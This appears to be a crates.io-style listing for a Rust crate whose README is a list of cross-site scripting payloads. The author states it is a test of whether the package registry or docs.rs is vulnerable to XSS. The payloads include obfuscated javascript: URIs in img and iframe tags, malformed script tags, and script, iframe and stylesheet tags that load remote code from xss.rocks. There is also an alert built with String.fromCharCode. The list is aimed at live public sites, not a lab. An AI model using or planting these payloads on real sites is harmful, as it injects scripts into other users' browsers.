6 releases

Uses old Rust 2015

0.1.5 Dec 27, 2017
0.1.4 Dec 27, 2017

#9 in #xss

ISC license

8KB

Testing for JS injection

Try a meta tag

<style> h1 { color: red !important; } </style>

This crate is just a test, I'm trying to find if cargo.io and/or docs.rs may be vulnerable to XSS.

Try to hover this image

Try to execute javascript with src attr in img tag

<img src=j&#X41vascript:alert('Injected from poisoned src from img tag in README.md')>

<IMG SRC=java\0script:alert("XSS")>

<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>

<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://xss.rocks/xss.js?< B ></SCRIPT> <SCRIPT SRC=//xss.rocks/.j> <iframe src=http://xss.rocks/scriptlet.html <</iframe>
<STYLE>@import'http://xss.rocks/xss.css';</STYLE> <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Try to click this anchor

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

<script> alert(String.fromCharCode(73, 110, 106, 101, 99, 116, 101, 100, 32, 102, 114, 111, 109, 32, 115, 99, 114, 105, 112, 116, 32, 116, 97, 103, 32, 105, 110, 32, 82, 69, 65, 68, 77, 69, 46, 109, 100)); </script>

No runtime deps